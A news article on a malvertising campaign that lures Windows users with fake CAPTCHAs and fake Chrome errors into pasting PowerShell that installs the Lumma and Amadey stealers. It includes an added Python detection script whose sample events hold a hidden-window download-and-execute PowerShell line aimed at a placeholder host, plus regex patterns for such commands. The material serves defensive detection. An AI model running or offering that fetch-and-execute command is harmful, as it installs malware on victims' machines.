New malware campaign targets PC users with fake CAPTCHAs and browser errors
Kaspersky has detected a new wave of attacks as part of a malicious campaign distributed via online advertisements aimed at Windows PC users. The process is simple: while browsing the web, targeted Internet users unknowingly click on an ad that covers the entire screen and redirects them to a fake CAPTCHA page, or to a fake Chrome error message, prompting them to follow steps that download an infostealer. Between September and October 2024, Kaspersky telemetry recorded more than 140,000 occurrences of these invasive ads, with more than 20,000 users having been redirected to pages hosting malicious scripts. In most cases, these were Brazilian, Spanish, Italian and Russian Internet users. To protect themselves, experts recommend that users exercise caution and avoid responding to suspicious requests.
A CAPTCHA is a security mechanism used on websites and applications to verify whether a user is a human or an automated program (a bot). Over the course of this year, there have been reports of threat actors distributing the Lumma stealer using fake CAPTCHAs, primarily targeting gamers. When visiting online gaming sites, these users are encouraged to click on an advertisement covering the entire screen. They are redirected to a fake CAPTCHA page with instructions that lead to downloading the virus. When they click the “I’m not a robot” button, Windows PowerShell code is copied to their computer’s clipboard. Instructional messages then invite them to paste the code into the terminal box and press Enter, triggering the download and launch of the Lumma virus.
The malware looks for cryptocurrency-related files, cookies, and password manager data on the victim’s device. It also visits the web pages of various e-commerce platforms to inflate their view counts, allowing the attackers to make additional financial gains.
A fake CAPTCHA containing malicious instructions
Faced with these new attacks, Kaspersky researchers have identified another attack scenario in which, instead of a CAPTCHA, an error message is displayed on a web page, designed to resemble a service message from the Chrome browser. The attackers ask their victim to “copy the patch” into the terminal window (the patch being the same PowerShell command described above).
A fake message that imitates Google Chrome
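Both scenarios above end the same way: the victim pastes a clipboard-delivered PowerShell one-liner into a terminal or run box, so the shell is launched by an interactive parent process rather than by a script, installer or scheduled task, and its command line fetches and executes remote content. The following triage script is an added example, not Kaspersky's tooling or anything from the article; it runs simple detection logic over a handful of constructed process-creation events (the field names, the `example.invalid` host and the base64 placeholder are all assumptions made for the demonstration).

```python
"""Flag shell launches that match the copy-and-paste pattern described in the
article: an interactive parent (the user's desktop or console) spawns a shell
whose command line downloads and executes remote content, or carries an
encoded command. Event shape and samples are constructed for this example."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (hypothetical schema)."""
    parent_image: str
    image: str
    command_line: str


# Parents that imply a human typed or pasted the command (assumed set).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "conhost.exe"}
# Shells / script hosts worth scoring.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-and-execute indicators; each hit is reported by name.
INDICATORS = [
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I), "remote-fetch"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "dynamic-exec"),
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\b", re.I), "encoded-command"),
    (re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I), "hidden-window"),
    (re.compile(r"\bhttps?://", re.I), "url"),
]


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the indicator names matched by one event (empty if none)."""
    if ev.image.lower() not in SHELLS:
        return []
    hits = [name for pat, name in INDICATORS if pat.search(ev.command_line)]
    if hits and ev.parent_image.lower() in INTERACTIVE_PARENTS:
        hits.insert(0, "interactive-parent")
    return hits


def is_suspicious(ev: ProcessEvent) -> bool:
    """Interactive parent plus (fetch AND exec) or an encoded command."""
    hits = set(score_event(ev))
    if "interactive-parent" not in hits:
        return False
    return "encoded-command" in hits or {"remote-fetch", "dynamic-exec"} <= hits


def triage(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that should be escalated."""
    return [(i, score_event(ev)) for i, ev in enumerate(events) if is_suspicious(ev)]


# Constructed sample telemetry; the host and blob are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'http://example.invalid/verify').Content\""),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -enc <base64-blob-placeholder>"),
    ProcessEvent("services.exe", "powershell.exe",
                 "powershell -File C:\\ProgramData\\backup.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell Get-ChildItem C:\\Users"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line!r} -> {reasons}")
```

The rule deliberately keys on the parent process rather than on the payload, because the hosting domain and encoding change between waves while the user-pasted launch chain does not; an encoded command with an interactive parent is escalated even when no URL is visible in the command line.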
Kaspersky has uncovered a new wave of attacks that no longer targets only gamers, distributed through file sharing services, web applications, bookmaker portals, adult content pages, communities of animators, and many other channels. Attackers are also using the Amadey Trojan in this attack wave. Like Lumma, it steals credentials from popular browsers and cryptocurrency wallets, but it can also take screenshots, obtain credentials for remote access services, and download a remote access tool onto the victim’s device, allowing the attackers to gain full control.
“The attackers purchased ad space, and if a user sees this ad and clicks on it, they are redirected to malicious resources, a commonly used tactic. This new wave involves a significantly expanded distribution network and the introduction of a new attack scenario that affects more victims. Now, Internet users can be diverted by a fake CAPTCHA question or an error message from the Chrome web page, and become victims of a stealer with new features. Businesses and individuals should exercise caution and critical thinking before following suspicious messages they see online,” says Vasily Kolesnikov, security expert at Kaspersky.